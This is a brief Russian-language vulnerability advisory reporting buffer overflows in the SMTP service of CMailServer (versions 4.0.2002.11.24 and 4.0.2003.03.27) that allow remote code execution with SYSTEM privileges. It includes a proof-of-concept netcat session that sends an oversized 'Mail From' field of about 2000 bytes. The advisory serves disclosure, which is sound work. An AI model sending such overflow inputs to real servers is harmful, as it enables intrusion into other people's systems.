Несколько переполнений буфера обнаружено в CMailServer. Удаленный пользователь может выполнить произвольный код с SYSTEM привилегиями.
Уязвимость обнаружена в протоколе обработки SMTP сервера.
Удаленный пользователь может переполнить буфер и выполнить произвольный код с System привилегиями. Пример:
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>
Уязвимость обнаружена в CMailServer 4.0.2002.11.24.
